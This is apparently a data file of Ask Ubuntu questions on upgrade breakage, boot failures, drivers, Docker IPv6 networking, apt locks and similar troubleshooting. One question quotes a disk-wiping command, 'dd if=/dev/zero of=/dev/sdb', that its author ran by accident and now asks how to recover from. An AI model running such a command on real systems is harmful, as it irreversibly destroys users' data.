452605	system wo n't suspend after upgrading to 14.04	few days ago i upgraded my linux machine to ubuntu 14.04 . after that , i notice that ubuntu wo n't suspend anymore . suspend works fine in 13.10 . when i execute `` suspend '' either from menu or from terminal with sudo pm-suspend the screen gets black with the following lines : [ 445.032801 ] pm : syncing filesystems âś done . [ 445.057818 ] pm : preparing system for mem sleep [ 445.058006 ] freezing user space processes -- - ( elapsed 0.001 seconds ) done . [ 445.059860 ] freezing remaining freezable tasks âś ( elapsed 0.001 seconds ) done . [ 445.061194 ] pm : entering mem sleep [ 445.061247 ] suspending console ( s ) ( use no_console_suspend to debug ) any ideas ?
452606	how to disable the disk write cache in ubuntu 13.10 ?	based on this answer i used : sudo hdparm -w 0 /dev/sda to try and disable the write cache on my ubuntu 13.10 box running on bare hardware . additionally in /etc/hdparm.conf i also uncommented from the line # write_cache = off when i run : hdparm -i /dev/sda i get : ... udma modes : udma0 udma1 udma2 udma3 udma4 udma5 *udma6 advancedpm=yes : unknown setting writecache=disabled drive conforms to : unknown : ata/atapi-3,4,5,6,7 ... regardless , i still get these insanely high write through puts that are higher than my read which leads me to believe my write cache is still active . what is the correct way to disable the write cache on a ubuntu 13.10 system ? ? ? i 'm attaching a screenshot of a utility i 've written that shows my write bw to be insanely high ( 2.2gb/s ) until the write cache is filled up ( looks like 1.2gb ) . any feedback is greatly appreciated .
452609	binary requires older version of a shared object	i was given a binary to execute , but running ldd ./name_of_binary gives libabc.so.1 = > not found ( i replaced the library name with 'libabc ' because i 'd like a general answer ) i have libabc.so.2 . how can i get libabc.so.1 ? or would the answer be specific for each library ?
452611	how to use `` docker.io '' containers in ubuntu 14.04 with ipv6 ?	i 'm trying this : at the physical host with ubuntu 14.04 ( container 's gateway for both ipv6 and ipv4 ) , i tried : root @ docker-srv-1 : ~ # ip -6 a a 2804 : xxx:4 : acbd : :1/64 dev docker0 of course , host docker-srv-1 can `` ping6 google.com '' and , the subnet 2804 : xxx:4 : abcd : :/64 is routed to it . i can `` ping6 2804 : xxx:4 : acbd : :1 '' from anywhere is the world ( container 's ipv6 gateway ( docker0 interface ) ) right now . later , i 'm planning to run the radvd directly on docker0 interface , so , the containers will auto-generate its own slaac ipv6 address automatically ( i believe it will , if works statically first ) . root @ docker-srv-1 : ~ # docker.io run -t -i tmartinx/ubuntu-14.04-server-cloudimg /bin/bash but , within the container : root @ 112c9071041a : / # ip -6 a a 2804 : xxx:4 : acbd : :20/64 dev eth0 rtnetlink answers : operation not permitted i also tried : root @ docker-srv-1 : ~ # docker.io run -- lxc-conf= '' lxc.network.ipv6=2804 : xxx:4 : acbd : :20/64 '' -- lxc-conf= '' lxc.network.ipv6.gateway=2804 : xxx:4 : acbd : :1 '' -d -e lxc -t -i tmartinx/ubuntu-14.04-server-cloudimg /bin/bash 235d2bea7d9b4cc54d08c6eb9e623e5655ac4e1668a9a7e255e796d254ce4845 2014/04/22 00:50:08 error : can not start container 235d2bea7d9b4cc54d08c6eb9e623e5655ac4e1668a9a7e255e796d254ce4845 : lxc.network.ipv6 = 2804 : xxx:4 : acbd : :20/64 is not supported by the native driver i found some tips here : http : //zargony.com/2013/10/13/ipv6-in-docker-containers - but it did n't worked ... : ' ( i also tried docker.io with `` -d -e lxc '' but , did n't worked with ipv6 either ... am i missing something ? ! edited # 1 : now i 'm running docker.io with -- privileged , like this : docker.io run -- privileged -t -i tmartinx/ubuntu-14.04-server-cloudimg /bin/bash so , i can run `` ip -6 a a $ ipv6_addr '' but , still ca n't ping6 its gateway ( locally reachable docker0 int - ipv4 works ) and , of course no ipv6 connectivity at all ... source : ipv6 address https : //github.com/dotcloud/docker/issues/4483 edited # 2 : after researching a bit more , i did : sudo apt-get install lxc added to /etc/default/docker.io the following line : docker_opts= '' -d -e lxc '' docker restarted but , still no ipv6 ... anyway , the error message is now different , look : root @ docker-srv-1 : ~ # docker.io run -- lxc-conf= '' lxc.network.ipv6=2804 : xxx:4 : acbd : :20/64 '' -- lxc-conf= '' lxc.network.ipv6.gateway=2804 : xxx:4 : acbd : :1 '' -t -i tmartinx/ubuntu-14.04-server-cloudimg /bin/bash lxc-start : can not add ipv6 gateway for eth0 when not bringing up the interface lxc-start : failed to setup netdev lxc-start : failed to setup the network for '5c7d1765a7a93bff96711865ebd9325b9b9bf071e89c466fe1ae75a336af10f8' lxc-start : failed to setup the container lxc-start : invalid sequence number 1. expected 2 lxc-start : failed to spawn '5c7d1765a7a93bff96711865ebd9325b9b9bf071e89c466fe1ae75a336af10f8' 2014/04/22 04:58:25 error : can not start container 5c7d1765a7a93bff96711865ebd9325b9b9bf071e89c466fe1ae75a336af10f8 : exit status 1 edited # 3 docker with ipv6 is working now ! ! ! what i did ? after installing lxc ( edited # 2 ) and reconfiguring docker_opts to enable it , docker with ipv6 is working with the following command : docker.io run -- privileged -- lxc-conf= '' lxc.network.ipv6 = 2804 : xxx:4 : acbd : :200/64 '' -- lxc-conf= '' lxc.network.ipv6.gateway = 2804 : xxx:4 : acbd : :1 '' -- lxc-conf= '' lxc.network.flags = up '' -t -i tmartinx/ubuntu-14.04-server-cloudimg /bin/bash if someone else have a better solution , please , post it ! thanks ! thiago
452615	told command dpkg can not be found	on issuing the command sudo dpkg -i ( package name ) at chronos @ localhost ~ $ , i get the response sudo : dpkg : command not found . anyone know why ? i 'm trying to load version 3 of network-manager and three related files to correct a known problem accessing wifi in 12.04 on some toshiba computers , so ubuntu is offline . i 've downloaded the four files , but i 'm unclear on where they should be stored in order for dpkg -i ( package name ) to find them . could i pursue the installation via apt-get if dpkg is actually missing . if so , what would be the correct command syntax ?
452616	bluetooth high quality support gone in ubuntu 14.04 ?	i have a bluetooth speaker ( http : //www.sound2go.net/produkte/bigbass-plus ) . in ubuntu 13.10 i could go to the audio settings and choose the bluetooth mode ( telephony - low quality , of high quality ) . like shown on this picture : in ubuntu 14.04 the speaker still works , but the sound quality is really bad . just like it was when the low quality mode was selected in ubuntu 13.10 . and the option to choose the mode is gone from the sound settings . like shown on this picture : i searched every place i could think of and did not find it elsewhere . how can i get decent sound quality with my speaker in ubuntu 14.04 ?
452617	grub customizer submenu not working	to begin i will confess that i am relatively new to ubuntu , so much of this is a learning experience for me but a learning experience i am open to nonetheless . my problem largely is that when utilizing grub customizer i seem to be able to update my grub configuration with each option listed invidivually but the second i try grouping them in a sub menu ( e.g . older linux versions ) then i get the below : please take a look at the command line output below . if you think this is a bug of grub customizer , please create one at https : //launchpad.net/grub-customizer ! generally grub customizer should prevent errors like this . failed running 'grub-mkconfig -o `` /boot/grub/grub.cfg '' ' output : generating grub.cfg ... found linux image : /boot/vmlinuz-3.11.0-19-generic found initrd image : /boot/initrd.img-3.11.0-19-generic found linux image : /boot/vmlinuz-3.11.0-18-generic found initrd image : /boot/initrd.img-3.11.0-18-generic found linux image : /boot/vmlinuz-3.11.0-15-generic found initrd image : /boot/initrd.img-3.11.0-15-generic found windows 8 ( loader ) on /dev/sda1 found linux image : /boot/vmlinuz-3.11.0-19-generic found initrd image : /boot/initrd.img-3.11.0-19-generic found linux image : /boot/vmlinuz-3.11.0-18-generic found initrd image : /boot/initrd.img-3.11.0-18-generic found linux image : /boot/vmlinuz-3.11.0-15-generic found initrd image : /boot/initrd.img-3.11.0-15-generic found memtest86+ image : /boot/memtest86+.bin error : syntax error . error : incorrect command . error : syntax error . error : incorrect command . error : syntax error . error : line no : 139 syntax errors are detected in generated grub config file . ensure that there are no errors in /etc/default/grub and /etc/grub.d/* files or please file a bug report with /boot/grub/grub.cfg.new file attached . done i searched the launchpad.net/grub-customizer website for a similar problem to no avail , i just do n't know what went wrong ... any suggestions ? thanks .
452629	i ca n't install xulrunner 1.9.2 on ubuntu 14.04	when trying to install xulrunner 1.9.2 . i 'm getting thsi error : setting up xulrunner-1.9.2 ( 1.9.2.28+build1+nobinonly-0ubuntu0.10.04.1 ) ... /var/lib/dpkg/info/xulrunner-1.9.2.postinst : 8 : /var/lib/dpkg/info/xulrunner-1.9.2.postinst : /usr/sbin/update-alternatives : not found dpkg : error processing package xulrunner-1.9.2 ( -- configure ) : subprocess installed post-installation script returned error exit status 127 errors were encountered while processing : xulrunner-1.9.2 e : sub-process /usr/bin/dpkg returned an error code ( 1 )
452630	client to os x server	i have used windows xp software for the networking about 6 computers which include both an os x mavericks machine and an ubuntu 12.04 machine . this has worked ok for years but offers little securtity and xp is disappearing and so i decided to get a mac mini and os x server and use the mini as the file server . all was fine on the windows machines and the os x one but the ubuntu machine sees the mini server but gets an error `` failed to retrieve share list from server : connection refused '' when one tries to open the shared files . i really am very keen to make this network setup work the os x server software is really nice and easy to use . any suggestions , i have searched and it seems to have been a common problem but i ca n't find a simple solution .
452631	ubuntu 14.04 doesn ' t boot after upgrade from 12.04 installed inside windows 8.1	i have ubuntu 12.04 installed like an app on windows 8.1 ( ubuntu 12.04 allow to be installed like an app in windows 8.1 and it can be removed when you do n't need it any more from control panel ) . usually , to chose what os to boot when you start the laptop , you can choose between windows 8.1 and ubuntu after windows logo appeared at start up and that was ok until i made this upgrade . now when i try to choose ubuntu the laptop try to boot it but , after that full colored screen is showed the screen go black and this messages appear : mount : mounting /dev/loop0/ on /root failed : invalid argument mount : mounting /dev on /root/dev failed : no such file or directory mount : mounting /sys on /root/sys failed : no such file or directory mount : mounting /proc on /root/proc failed : no such file or directory target filesystem doesn ' t have requested /sbin/init no init found . try passing init = bootarg . busybox v1.21.1 ( ubuntu 1:1:21.0-1ubuntu1 ) built-in shell ( ash ) enter 'help ' for a list of built-in commands ( initramfs ) _ i don ' t know what to do after this screen appears . please help !
452632	correct way of downloading the running ubuntu 12.04 source code	if i download the source code as : git clone git : //kernel.ubuntu.com/ubuntu/ubuntu-precise.git in makefile i can see version = 3 patchlevel = 2 sublevel = 55 extraversion = if i do this : apt-get source linux-image- $ ( uname -r ) in makefile i can see version = 3 patchlevel = 8 sublevel = 13 extraversion = .19 none of the above two matches with my running kernel : # lsb_release -a no lsb modules are available . distributor id : ubuntu description : ubuntu 12.04.4 lts release : 12.04 codename : precise also : 3.8.0-38-generic # 56~precise1-ubuntu smp thu mar 13 16:23:47 utc 2014 i686 i686 i386 gnu/linux i understand i should have the exactly same source code that is running for developing and loading a driver using insmod . so how do i download the matching source code
452634	why i have only vpn connection and proxy connection after system update ?	i have upgraded my ubuntu 11.04 to 11.10 and im about to upgrade to the latest but i can download because i have no internet , so this is what happened : i have upgraded my ubuntu 11.04 but after i restart to activate the updates my wireless internet is gone , all wireless internet is gone ( i think its like the wireless internet is deactivate ) i only choose v.p.n connection and when i click network on settings i can only select proxy and v.p.n i literally do n't receive signals i ca n't add wireless internet connection i do n't want to disappoint my mom and dad that i have to bring my laptop to the repair 2nd time this month shop i have compaq presario c700 its an old pc but very valuable to me please help ! thank you !
452637	problem with updating ( confilting distribution : deb.opera.com )	when i run update-manager i have this message : w : conflicting distribution : http : //deb.opera.com testing release ( expected testing but got stable ) , w : failed to fetch http : //deb.opera.com/opera/dists/lenny/non-free/binaryi386packages 404 not found , e : some index files failed to download . they have been ignored , or old ones used instead . i have ignore this in the past since it did n't affect my daily usage of my system . now that i want to update from 12.04 to 14.04 , it wont allow me with the same error message . i have removed opera but it did n't seem to help ay idea about what would help ? thanks nemo
452638	how can i solve unable to lock the administration directory ( /var/lib/dpkg/ )	i am really new to ubuntu 14.04 and whenever i try to update or install anything i get this error : > sudo apt-get update [ sudo ] password for trojanfm : e : could not get > lock /var/lib/apt/lists/lock - open ( 11 : resource temporarily > unavailable ) e : unable to lock directory /var/lib/apt/lists/ e : could > not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily > unavailable ) e : unable to lock the administration directory > ( /var/lib/dpkg/ ) , is another process using it ?
452639	lost option to os choice on boot after ubuntu install	i have xp home and xp pro installed on two different drives on my machine . the home is on a 40g ( e : drive ) and pro is on the other drive ( c : ) . when booting , i used to have a choice to pick which one to boot from on the bios screen after bios starts . since i installed ubuntu and configuring the e : drive , i have lost the screen to choose which os i want to boot . i repartitioned the e : drive ( with the win home os ) using partitionmagic 8.0 . i used the option to create a linux partition and the swap partition . now the drive configuration is as follows : swap partition , linux partition , then e : partition . i played with the boot order in bios and now i have to choose the c : drive to boot instead of the e : drive to get win xp , as before the order of boot device was cd/w , floppy , then ide ( e : ) . ( in my bios orginally , under ide choice , i had it set for the e : drive ) i do n't know if the order of partitions on the drive are preventing the bios to give the os choice on boot up , or there 's something else i have to do .
452640	mount point name changed	i had ubuntu 13.10 for a while and recently upgraded to ubuntu 14.04 . there is a problem in the mount point name of my hard disk . i had a partition name stuff and for some reason after upgrading the distro it changed to stuff1 automatically . this is creating problems when i try to use ktorrent . it says that the disk containing the data is not mounted . when i try to use the move data option by right-clicking any torrent , it says that i do not have the required permission to access the disk . meanwhile all my data is present in stuff1 as it was in stuff but i do n't know how to resolve the issue .
452646	can not connect sftp with filezilla	here is what i have : - openstack havana installed in ubuntu 12.04.4 server i have successfully launched a ubuntu cloud image 's instance in opnenstack . i can successfully ping/ssh to my instance via my openstack 's host , that is ubuntu 12.04.4 server . what i want is that to upload files to ubuntu instance from my openstack 's host using filezilla ( i know it supports sftp ) . when i try to connect it says . connection timed out note : - filezilla is installed on my ubuntu which is hosting my openstack and i can successfully ssh to my instance from here
452647	why is gib used insteed of gb	i do n't know where to ask this question so i posted it here . i see that in ubuntu the sign for gigabytes , megabyte etc are used as gib , mib etc . so my question is : what is the reason for using i between gb .
452649	guest additions not working	i am having really annoying problem and have spent hours trying to fix . i have searched ad nauseum and found others with same problem but none of the solutions work . i go to devices to install guest additions and find that instead it says insert guest additions cd . when i try that it says it can not insert and asks if i want to force mount . i try that and i get error that it can not force unmount because it is locked ( i get an error that is similar to this ) . what the heck is going on ? appreciate any advice . thank you !
452651	forgot username and password	username and password forgotten . how do i login ? i have not used the programme yet and the system does not allow me to login .
452653	libre office is opening without menus	libre office is opening without menus ... how can i solve this ? -i 'm using ubuntu 14.04 x64-
452654	why is apt unable to find bitcoin-qt package ?	when i run these commands : sudo add-apt-repository ppa : bitcoin/bitcoin sudo apt-get update sudo apt-get install bitcoin-qt i get this : e : unable to locate package bitcoin-qt . i am writing it completely correctly ; is the ppa not updated for 14.04 ? why ca n't i install the program ? even if i write apt-cache search bitcoin it does n't show up . i 'm on lubuntu 14.04 fresh installation .
452656	problem with upgrade from 13.10 to 14.04	i start upgrade from ubuntu server 13.10 to 14.04 , during upgrade process i receive message for replace 000-default.conf file , i choice ( d ) for view differences , but after this i can not get out from view difference mode and continue upgrade . any suggestions ? i try with esc , ctrl+x , end , ctrl+end but nothing .
452661	where is start-up applications in 14.04 unity ?	i can not find the start-up applications in 14.04 , i read on a forum that you had to go into main menu and allow it to be visible through preferences , but i have looked all the way through preferences and i still have n't found it ? ? ? ? thanks
452662	synaptics touchpad driver needed	i have a synaptics touchpad that works with synaptics driver version 16* on windows 8.1 and has some nice gestures , especially pinch to zoom , rotate ... i installed many ubuntu versions and looked for an equivalent driver with especially pinch to zoom features without luck ! i am sure a lot of other new linux users have similar issue , so can anyone help us please !
452665	fallback to gnome classic desktop ubuntu 14.04	i 'm using ubuntu for a while and experienced many bugs in unity and also it kills productivity . i recently checked backtrackr3 release which is built on gnome2.3 . but , unfortunately that is available only with ubuntu 10.04 which has got its support period over . so , can i able to switch back to gnome 2.32 as shown in the figure below from ubuntu 14.04 ? if so , which is the best flavor i can download ? ubuntu unity or ubuntu gnome ?
452667	tell fstrim to ignore mount ?	i 've just enabled fstrim cron job on my new build in ubuntu 14 as it was n't turned on by default . my question is , how do i tell it to ignore certain mounts ? ie my ssd is my boot drive but i have a standard harddrive mounted under /media along with some nfs shares . do i need to tell fstrim to ignore these or can it already tell that its not on an ssd ?
452671	ubuntu 14.04 unity desktop without panel and launcher	now after having succeeded to make running the new ubuntu 14.04 i see , that unity seems not to work ( the desktop appears without launcher and panel ) . gnome is working . ccsm is possible to open under gnome but not under unity . if i change to console ( ctrl-alt-f1 ) and try to start unity then opengl seems to be the problem . so how to start opengl and unity plugin , if this is the reason ?
452672	kdm theme in kubuntu 14.04	i just upgraded to kubuntu 14.04 , and when i went to reconfigure kdm ( because i 'm not a fan of the current theme ) , i realized that there was no way to add more themes , and there were only two there . how can i install themes for kdm ?
452679	how to make keyboard shortcuts work while in another language	is there a way to make standard keyboard shortcuts ( e.g . ctrl+c for copy or ctrl+a for select all ) work while the input language is not than english ? for example , while writing in word on windows you can still do ctrl+a even if you 're in another language , even in right-to-left languages such as hebrew . however on libre writer on ubuntu it seems that you have to switch back to english , then do a shortcut , then switch back . that 's kind of not short for a shortcut ...
452684	fail to start synaptic on ubuntu 14.04	just did fresh install ubuntu 14.04 , which comes with unity , and after that i installed ubuntu gnome desktop . at the beginning synaptic has no problem , then after i installed another package ( gimp , if i remember correctly ) , i got this message when try to run synaptic error in `synaptic ' : malloc ( ) : memory corruption : 0x00000000026f2cb0 *** aborted ( core dumped ) anyone of you guys got the same error ? any solution appreciated . cheers .
452685	how to get a timestamp on rsync output	i have an hourly crontab job @ hourly rsync -avc -- delete /dira/ /dirb/ > /home/job.txt however when i check the logbook i see no timestamps . how can i get timestamps in the log so that i can be able to see when error occur ?
452686	ninja ide programming python 2.x and 3.x	is it possible to program python 2.x and 3.x with ninja ide ? if so , where do i specify which version i 'm currently using ? thanks peeps edit : actually , it seems that in the same file , ninja ide execute both version ( try to do a simple print of each version ... ) . so my question now , how does it chooses which python interpreter to use . is this evaluate at each line of my script ?
452688	what version of ubuntu is compatible with emachines e525 laptop-acer intel	ubuntu 12.04 was incompatible with my acer emachines e525-304932mi/64-bitintel gl 40 express . at that time i replaced the original windows with fedora 14 i386 . i am hoping that programing developments within ubuntu have fixed this . the information from different sources is unclear but one link inferred that ubuntu desktop 14.04 lts was poss . can anyone confirm this or know of another version that does work ? thanks in advance graeme
452691	14.04 alt key conflict after changing hud and window menu shortcuts	in 14.04 i changed the keyboard/shortcuts settings so that : launcher/ '' key to show hud '' is now alt z however , when i press alt , the application menu shows up . that is specially a problem with midnight commander in guake when `` hide on loose focus '' is enabled . then each time you press alt , the guake window disappears . not the end of the world since disabling the `` hide on loose focus '' solves the problems , but my question is : what is the procedure so that alt stops showing the application menu ? thanks in advance , seb
452694	how to create bootable usb drive ( ubuntu )	i want to create a bootable usb key drive in order to be able to run/install an ubuntu iso image with it . how can i do that using ubuntu ( command line ) ?
452695	directly connect windows and ubuntu computers via ethernet cable	i have the following computers on a network : lenovo b570e [ ubuntu 14.04 lts ] dell inspiron n4050 [ windows 8.0 professional ] hp l1000 [ windows 8.1 enterprise ] compaq [ mercury , do n't know the exact name ] [ windows xp sp3 ] i want to share data between pc 's and i have ethernet cable [ simple , not crossover ] desktop is 32bits and all other machines are 64bits . i want to share data between ubuntu and windows . how can i achieve this ? i know filezila and network methods but i want faster and ethernet cable method due to large amount data .
452697	apache2 after update from 13.10 to 14.04	i´m using a webserver ( php ) this works fine until 13.10 . now i updated to 14.04 tls the apache2 server ( my impression ) not in the correct directory \var\www this is what i see : index of / [ ico ] name last modified size description apache/2.4.7 ( ubuntu ) server at luke2 port 80 when i´m using a http : //luke2.avmbenelux.local/info.php i see : not found the requested url /info.php was not found on this server . apache/2.4.7 ( ubuntu ) server at luke2 port 80 when i look into /var/www i see info.php available apache2.conf : # sets the default security model of the apache2 httpd server . it does # not allow access to the root filesystem outside of /usr/share and /var/www . # the former is used by web applications packaged in debian , # the latter may be used for local directories served by the web server . if # your system is serving content from a sub-directory in /srv you must allow # access here , or in any related virtual host . < directory / > options followsymlinks allowoverride none require all denied < /directory > < directory /usr/share > allowoverride none require all granted < /directory > < directory /var/www/ > options indexes followsymlinks allowoverride none require all granted < /directory > any idea ?
452698	discs unable to set manual mounting options in 14.04	i 've done a fresh install of 14.04 after i seen that the online upgrade process from 13.10 left me with a lot of unsolvable bugs . the issue is that i can not set manual mounting options from discs on ext4 partition i used the same options as i did in past releases and worked ( it also worked after i first did the upgrade ) . gparted can mount it , but i need to set it to mount on boot . this is the error i get when trying to mount from discs : error mounting system-managed device /dev/sda8 : command-line `mount `` /media/tot-ubuntu '' ' exited with non-zero exit status 32 : mount : wrong fs type , bad option , bad superblock on /dev/sda8 , missing codepage or helper program , or other error in some cases useful info is found in syslog - try dmesg | tail or so ( udisks-error-quark , 0 ) i have the following fields set : mount on startup- checked show in launcher- checked mounting options- nosuid , nodev , nofail , x-gfx-show mounting point- /media/tot-ubuntu identified by- label=tot-ubuntu filesystem type- auto ( tried setting it as ext4 also but no luck ) tried mounting it with uuid but still no luck from discs . only my ntfs partitions can mount .
452699	trouble boot up the 14.04 version	i get a âserious errors while checking the disk drives for /bootâ error while booting 2 answers i installed ubuntu 14.04 with wubi inside windows 7 and then after installation is completed and system is about to start it shows -serious errors were found while checking the disk drive for / . if i ignore then it shows : -the disk drive for /tmp is not ready yet or not present then if i skip -an error occurred while mounting / . if i skip that too it shows ubuntu 14.04 lts tty1 requires login . and gui never shows . why does this happen ? i tried reinstalling and same thing happens . any idea ? this is not my pc only but many have necountered the same problem ?
452702	file not created by a python script that runs on boot	i have scripted two python codes . one , to run on boot and to create a file locally in the same directory where the code is placed another one to sense a low to high signal in gpio . i have placed the code at /etc/rc.local . i 'm trying something like this . sleep 1 ; python /home/ubuntu/desktop/lcd.py & sleep 1 ; python /home/ubuntu/desktop/button.py exit 0 both the codes , runs on boot and no issue with that . the problem i 'm facing is that the first code `` lcd.py '' should create a local file and the file has not been created . i have searched for the existence of file in both the /etc directory and the path of the python script . can someone help me fix this problem ?
452703	is it possible to move the content view of terminal to the center while full screen the window ?	i know i can use ctrl + shift + '+ ' to change the font size . but now as my code are on show on the left-side , i want to move them to center . by drag the window i can do so , but that will show the background under the terminal window . can i move my code view to the center while the terminal is fullscreen ? how ?
452705	how to configure compose key in 14.04	i frequently use the compose key to type special characters . i now have a fresh install of ubuntu 14.04 , and in the keyboard settings it says `` compose key : disabled '' . i ca n't find how to set the compose key .
452710	facebook is not responding accordingly in firefox ?	i have ubuntu 13.10 , on lenovo g585 . i have reported some of my problems before , and you were very helpful . facebook ( only ) is not responding accordingly only in firefox , but works fine in chromium , any ideas why and how to fix it ? this is a constant problem for me . going on facebook with firefox makes it slow loading page , it freezes and not reacting on clicks + makes my screen go gray-ish . also , it crushed my firefox completely . i use firefox all the time , i got use to it , i guess . but , this is a bit frustrating . so , i 've installed chromium , and there is no problem like that . is it some of the add-ons or java or something else ? help will be appreciated . : )
452711	ubuntu 14.04 getdeb installation problems	i installed ubuntu 14.04 . later i tried to install getdeb with sudo dpkg -i getdeb-repository_0.1-1~getdeb1_all.deb . it got stuck at connecting to archive.getdeb.net.. i aborted this with ( ctrl+c ) ^c . accompanying this there are several errors like frequent /var/lib/dpkg/lock locks and almost any installation is getting stuck at connecting to archive.getdeb.net.. please guide me to resolve these problems .
452713	after upgrading from 13.10 to 14.04 my screen constantly fades to black . how to fix ?	i have an nvidia 8600gt graphics card and am currently running the x.org nouveau display driver . when i boot i get a normal 14.04 login screen with no issues . once i log in i see my desktop as expected . then when i click on the unity menu icon in the top left the menu flies out as expected but the screen darkens a little over and over until i have a blacked out desktop . mouse cursor remains normal though . if i right click about the screen sometimes the right click menu with jog the desktop into visibility again but then it quickly reverts to the blacked out state . does anyone know of a fix for this issue ?
452714	is dropbox going to always resolve my symlinks ?	i have one folder within my dropbox directory , and a link to that folder , also in my dropbox directory . i use the files within my dropbox folder on a laptop and a desktop computer . i thought that since both the symlink and the folder it points to are both within the dropbox folder that they would operate as usual . however , after i use the folders on one machine , when i return to the other , the symlink will be replaced with a copy of the contents of the folder it originally pointed to . dropbox is completely defeating the purpose of having a symlink . is there a way i can force dropbox to preserve the symbolic link relationship between the link and the folder ?
452717	resize ubuntu partition ?	well i installed ubuntu 13.10 on my system alongside windows xp , and assigned it about 15 gb of space . but now i have almost run out of my space on ubuntu . now i have another 20 gb ext4 partition , but it 's not next to my ubuntu partition . so i was not able to resize my ubuntu partition . my question is that is there a way i could extend my ubuntu partition using the space from my other 20 gb ext4 partition ? i would welcome a solution , since i really do n't want to reinstalling ubuntu and all that ... .
452722	ubuntu 14.04 destop does n't work	after i updated my ubuntu 13.10 to 14.04 , i ca n't start the desktop anymore . booting seems fine , but the log in screen doesnât fill the whole window . after login , i get a dead screen , with only the mousepointer and the wallpaper ; no menu . i tried running the update and upgrade again , but nothing fixed this problem . i also tried restarting lightdm , but with no luck .
452725	ubuntu 14.04 slows down	i have parallel installed ubuntu 14.04 with ubuntu 12.04 . but ubuntu 14.04 is running very slow and its crashes down again and again . is there any problem with two parallel os.. ? ?
452728	ubuntu upgrade from 12.04 to 14.04	is it possible to upgrade from version 12.04 to 14.04 without uninstalling the former one ?
452731	can not write to log file pg_upgrade_internal.log on pg_upgrade	i keep on getting the above error whenever i run the following command via a postgres user . $ /usr/lib/postgresql/9.3/bin/pg_upgrade -b /usr/lib/postgresql/9.1/bin/ -b /usr/lib/postgresql/9.3/bin/ -d /var/lib/postgresql/9.1/main -d /var/lib/postgresql/9.3/main can not write to log file pg_upgrade_internal.log failure , exiting i 'm using ubuntu 13.10 . both postgresql 9.1 and 9.3 are running properly .
452734	why i ca n't use update-alternatives to select python 2 or 3 ?	is there a particular reason on why update-alternatives is not working with python since ubuntu comes bundled with different versions ?
452735	installing doomsday wads and starting doomsday ?	all right , a nice easy one for you all ... i installed `` doomsday '' from the ubuntu software center , but where do i put my doom wad files ? also , the ubuntu software center says that i need to run this from terminal - what is the applicable command and is it possible to create a shortcut in the unity applications/programs menu to run doomsday ?
452738	it possible to restore the system , after dd if=/dev/zero of=/dev/sdb ?	as a result of the following command dd if=/dev/zero of=/dev/sdb ( i wanted reset /dev/sdd ) , i accidentally deleted my system directories . after removal of my ubuntu continued to work as nothing was . but after rebooting ubuntu not loaded and i see a black screen . it possible to restore the system ?
452741	why does my system shut down when running ffmpeg ?	i am converting mp4 to ogg for many videos with ffmpeg but at some point during this process , my computer is shutting down . any idea why or how i can prevent this ?
452743	installing itunes	hi guys iâm newbie in ubuntu world ! so guys iâm running ubuntu 14.04 / 64bits , and i installed itunes 64 bits version 10.7.0 using wine ! while trying to run itunes i always get this error : itunes was not properly installed . if you wish to import or burn cds you need to reinstall itunes . then when i click ok , i get this screen : : i tried to run : sudo apt-get update in the terminal , did n't work i also tried to restart my laptop did n't work either . i need help to make it work properly so that i can connect my idevices . thanks in advance
452746	make wifi preferable over wired connection in ubuntu 14.04 ?	how do i make ubuntu choose wifi connection over wired connection when both are connected to internet ? i edited the ethernet connection to route using the preference `` use this connection only for resources on this network '' , which other people have reported having success with as a means of getting wifi preferred , but it does n't work for me . the issue persists . ethernet is still being preferred for internet , and wifi gets ignored . another thing , is it possible to use wired connection as fail over connection to wireless ?
452748	how to fix : epson wireless networked printer aborts after printing half a page	ubuntu 12.04.4 lts epson stylus tx550w multifunction printer ( copies , scans , but no fax ) : the first time i managed to discover the printer on my wireless lan . however , when printing the ubuntu test page , only one-third was printed , then the printer stopped . then i installed these deb-packages : epson-inkjet-printer-stylus-tx550w-series_1.0.0-1lsb3.2_i386.deb openprinting-gutenprint_5.2.7-1lsb3.2_i386.deb epson-inkjet-printer-escpr_1.4.0-1lsb3.2_i386.deb iscan_2.29.3-1~usb0.1.ltdl7_i386.deb iscan-data_1.27.0-1_all.deb iscan-network-nt_1.1.1-1_i386.deb when i search for new printers at 192.168.0.2 ( found from my wifi routers page ) , it `` finds '' an hp laser jetdirect ( ? ) . if i put socket : //192.168.0.2 in the uri or host box , it starts foomatic and i can choose manufacturer ( epson ) , model ( stylus tx550w ) , and a choice of cups , gutenprint , or special seiko linux drivers . but it still prints only one third of any page , whether it be from a brower , libreoffice , or ubuntu test page , before it stops . the status can be stopped or stopped - bad printer configuration . does anybody know what to do ?
452749	power consumption in ubuntu 14.04	i am using 14.04 in virtual box . each time i switch on the vm , the laptop powers off . the host being windows 7 . it is already over 7-8 times this has happened . please let me know how to nullify this . thanks in advance ! !
452750	reboot after shutdown ( ubuntu 14.04 ( also 12.04 ) ; dell latitude e7440 )	i have a rather serious shutdown/reboot issue with my ubuntu os on my brand new dell latitude e7440 netbook . the issue does not seem to depend on the os version : it occurs with 12.04 , 13.10 and now with 14.04 . i 've waited for the new lts in the hope that it would solve my problem , but that is not the case . after shutting down my ubuntu , my laptop reboots about two seconds after shutdown . i 've tried many things to solve it , but none of them did the job . i have the 64 bit version of 14.04 installed and boot in legacy boot mode with secure boot disabled . the behavior is independent from a power cable/usb device/ethernet cable being plugged in . strange enough , however , it does sometimes stay powered off after being used for several hours ... i know there have been several treats concerning shutdown/reboot issues , but none of them provides an answer to my specific case . i ran diagnostics in the bios to recover any potential hardware problems , but there were none . if you have an answer or even a clue on how to solve this issue , it will be highly appreciated ! thanks in advance !
452751	ubuntu 14.04 not seen on puppy slacko grub	i have a problem and wonder if anyone could help me please . i installed ubuntu studio 12.04 on my computer . after that i installed puppy slacko 5.6 and set up it 's grub as default . recently i installed a third system ubuntu 14.04 . during installation ubuntu 14.04 recognized u.studio and suggested to install itself along studio . it did not `` see '' puppy at all . i did as suggested and rebooted . i thought that ubuntu 14.04 grub will take over automatically but instead upon rebooting , puppy 's grub appeared with no recognition of ubuntu 14.04 at all . i wonder if you have any suggestions what to do to make puppy 's grub recognize ubuntu 14.04 or to set studio 's grub to take over , please . puppy and studio are the only two systems i can start from puppy 's grub menu at the moment . thanks for help adam
